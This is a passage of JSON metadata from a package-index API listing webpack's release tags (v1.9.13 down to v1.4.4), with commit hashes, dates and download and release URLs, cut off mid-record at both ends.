ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https: